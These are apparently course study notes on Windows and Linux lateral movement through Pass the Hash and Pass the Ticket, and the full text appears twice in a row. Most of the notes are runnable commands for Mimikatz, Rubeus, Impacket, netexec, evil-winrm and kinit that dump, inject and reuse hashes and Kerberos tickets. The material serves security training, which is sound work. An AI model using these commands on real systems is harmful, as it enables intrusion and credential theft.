Windows Lateral Movement

1. Pass the Hash (PtH) Attack

Core Concept

Technique using password hash instead of plaintext password for authentication
No need to decrypt the hash
Exploits authentication protocol where hash remains static until password change

Windows NTLM Authentication Key Points

Challenge-response authentication protocol
Still common despite known flaws (legacy compatibility)
No password salting = vulnerability to PtH attacks

Requirements

Administrative privileges/specific privileges on target
Ways to obtain hashes:
- Dumping local SAM database
- Extracting from NTDS database (ntds.dit) on Domain Controller
- Pulling from memory (lsass.exe)

Attack Methods & Tools

1. Mimikatz (Windows)

mimikatz.exe privilege::debug "sekurlsa::pth /user:username /rc4:NTLM_HASH /domain:domain.htb /run:cmd.exe" exit

Required parameters:

/user - Target username
/rc4 or /NTLM - NTLM hash
/domain - Domain name (use computer name/localhost/. for local)
/run - Program to execute (default: cmd.exe)

2. PowerShell Invoke-TheHash

# SMB Method
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target IP -Domain domain.htb -Username user -Hash HASH -Command "command"

# WMI Method
Invoke-WMIExec -Target hostname -Domain domain.htb -Username user -Hash HASH -Command "command"

3. Impacket (Linux)

impacket-psexec administrator@IP -hashes :HASH
impacket-wmiexec
impacket-atexec
impacket-smbexec

4. CrackMapExec (Linux)

# Network scan with hash
netexec smb IP/24 -u Administrator -d . -H HASH

# Command execution
netexec smb IP -u Administrator -d . -H HASH -x "command"

5. Evil-WinRM (Linux)

evil-winrm -i IP -u Administrator -H HASH

6. RDP Pass the Hash (Linux)

# Enable Restricted Admin Mode on target:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Connect:
xfreerdp /v:IP /u:username /pth:HASH

Important PtH Considerations

UAC limits PtH for local accounts
LocalAccountTokenFilterPolicy affects remote admin capabilities:
- 0 = only built-in admin (RID-500)
- 1 = all local admins
Domain accounts with admin rights bypass these restrictions

2. Windows Pass the Ticket (PtT) Attack

Overview

Definition: A PtT attack leverages stolen Kerberos tickets (TGT or TGS) to move laterally in an Active Directory (AD) environment
Purpose: Exploits Kerberos authentication mechanisms without requiring NTLM password hashes or plaintext credentials

Kerberos Protocol Fundamentals

Key Concepts

Ticket-Based Authentication:
- Designed to minimize password sharing across services
- Tickets authenticate users without transmitting passwords
Kerberos Components:
- TGT (Ticket Granting Ticket): Obtained after initial authentication; used to request service tickets (TGS)
- TGS (Ticket Granting Service): Grants tickets for accessing specific services

Ticket Harvesting Tools

1. Mimikatz

# Extract tickets
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

2. Rubeus

# Dump tickets in Base64
c:\tools> Rubeus.exe dump /nowrap

# Retrieve and inject TGT
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[HASH] /ptt

# Import .kirbi ticket
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi

Lateral Movement Techniques

PowerShell Remoting

# Using Mimikatz
kerberos::ptt "[TICKET_FILENAME].kirbi"
Enter-PSSession -ComputerName [TARGET]

# Using Rubeus
Rubeus.exe createnetonly /program:"cmd.exe" /show
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi
Enter-PSSession -ComputerName [TARGET]

3. Linux Pass the Ticket (PtT) Attack

Key Linux Kerberos Attack Concepts

Leveraging Kerberos tickets on Linux machines integrated with Active Directory
Ticket storage in keytab or ccache files
Often located in /tmp directory or /etc/krb5.keytab

Attack Methodology

Ticket Discovery

# Check domain integration
realm list

# Find keytab files
find / -name *keytab* -ls 2>/dev/null
ls -la /tmp

# Check authentication services
ps -ef | grep -i "winbind\|sssd"

User Impersonation

# Inspect keytab file
klist -k -t /opt/specialfiles/carlos.keytab

# Impersonate user
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
klist

# Access network resources
smbclient //dc01/carlos -k -c ls

Additional Attack Techniques

# Set Kerberos cache
export KRB5CCNAME=/home/user/krb5cc_647401106

# Use Impacket with Kerberos
proxychains impacket-wmiexec dc01 -k

# Convert ticket formats
impacket-ticketConverter krb5cc_ticket julio.kirbi

Post-Exploitation

Check sudo privileges with sudo -l
Use tools like Linikatz for credential extraction
Potential privilege escalation paths

Mitigation Strategies

Implement strong password policies
Use Multi-Factor Authentication (MFA)
Limit administrative privileges
Regularly update and patch systems
Monitor and log authentication events
Use advanced endpoint protection

PreviousLinux Local Password Attacks NextFiles & Archives Cracking

Windows Lateral Movement

1. Pass the Hash (PtH) Attack

Core Concept

Technique using password hash instead of plaintext password for authentication
No need to decrypt the hash
Exploits authentication protocol where hash remains static until password change

Windows NTLM Authentication Key Points

Challenge-response authentication protocol
Still common despite known flaws (legacy compatibility)
No password salting = vulnerability to PtH attacks

Requirements

Administrative privileges/specific privileges on target
Ways to obtain hashes:
- Dumping local SAM database
- Extracting from NTDS database (ntds.dit) on Domain Controller
- Pulling from memory (lsass.exe)

Attack Methods & Tools

1. Mimikatz (Windows)

mimikatz.exe privilege::debug "sekurlsa::pth /user:username /rc4:NTLM_HASH /domain:domain.htb /run:cmd.exe" exit

Required parameters:

/user - Target username
/rc4 or /NTLM - NTLM hash
/domain - Domain name (use computer name/localhost/. for local)
/run - Program to execute (default: cmd.exe)

2. PowerShell Invoke-TheHash

# SMB Method
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target IP -Domain domain.htb -Username user -Hash HASH -Command "command"

# WMI Method
Invoke-WMIExec -Target hostname -Domain domain.htb -Username user -Hash HASH -Command "command"

3. Impacket (Linux)

impacket-psexec administrator@IP -hashes :HASH
impacket-wmiexec
impacket-atexec
impacket-smbexec

4. CrackMapExec (Linux)

# Network scan with hash
netexec smb IP/24 -u Administrator -d . -H HASH

# Command execution
netexec smb IP -u Administrator -d . -H HASH -x "command"

5. Evil-WinRM (Linux)

evil-winrm -i IP -u Administrator -H HASH

6. RDP Pass the Hash (Linux)

# Enable Restricted Admin Mode on target:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Connect:
xfreerdp /v:IP /u:username /pth:HASH

Important PtH Considerations

UAC limits PtH for local accounts
LocalAccountTokenFilterPolicy affects remote admin capabilities:
- 0 = only built-in admin (RID-500)
- 1 = all local admins
Domain accounts with admin rights bypass these restrictions

2. Windows Pass the Ticket (PtT) Attack

Overview

Definition: A PtT attack leverages stolen Kerberos tickets (TGT or TGS) to move laterally in an Active Directory (AD) environment
Purpose: Exploits Kerberos authentication mechanisms without requiring NTLM password hashes or plaintext credentials

Kerberos Protocol Fundamentals

Key Concepts

Ticket-Based Authentication:
- Designed to minimize password sharing across services
- Tickets authenticate users without transmitting passwords
Kerberos Components:
- TGT (Ticket Granting Ticket): Obtained after initial authentication; used to request service tickets (TGS)
- TGS (Ticket Granting Service): Grants tickets for accessing specific services

Ticket Harvesting Tools

1. Mimikatz

# Extract tickets
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

2. Rubeus

# Dump tickets in Base64
c:\tools> Rubeus.exe dump /nowrap

# Retrieve and inject TGT
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[HASH] /ptt

# Import .kirbi ticket
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi

Lateral Movement Techniques

PowerShell Remoting

# Using Mimikatz
kerberos::ptt "[TICKET_FILENAME].kirbi"
Enter-PSSession -ComputerName [TARGET]

# Using Rubeus
Rubeus.exe createnetonly /program:"cmd.exe" /show
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi
Enter-PSSession -ComputerName [TARGET]

3. Linux Pass the Ticket (PtT) Attack

Key Linux Kerberos Attack Concepts

Leveraging Kerberos tickets on Linux machines integrated with Active Directory
Ticket storage in keytab or ccache files
Often located in /tmp directory or /etc/krb5.keytab

Attack Methodology

Ticket Discovery

# Check domain integration
realm list

# Find keytab files
find / -name *keytab* -ls 2>/dev/null
ls -la /tmp

# Check authentication services
ps -ef | grep -i "winbind\|sssd"

User Impersonation

# Inspect keytab file
klist -k -t /opt/specialfiles/carlos.keytab

# Impersonate user
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
klist

# Access network resources
smbclient //dc01/carlos -k -c ls

Additional Attack Techniques

# Set Kerberos cache
export KRB5CCNAME=/home/user/krb5cc_647401106

# Use Impacket with Kerberos
proxychains impacket-wmiexec dc01 -k

# Convert ticket formats
impacket-ticketConverter krb5cc_ticket julio.kirbi

Post-Exploitation

Check sudo privileges with sudo -l
Use tools like Linikatz for credential extraction
Potential privilege escalation paths

Mitigation Strategies

Implement strong password policies
Use Multi-Factor Authentication (MFA)
Limit administrative privileges
Regularly update and patch systems
Monitor and log authentication events
Use advanced endpoint protection

PreviousLinux Local Password Attacks NextFiles & Archives Cracking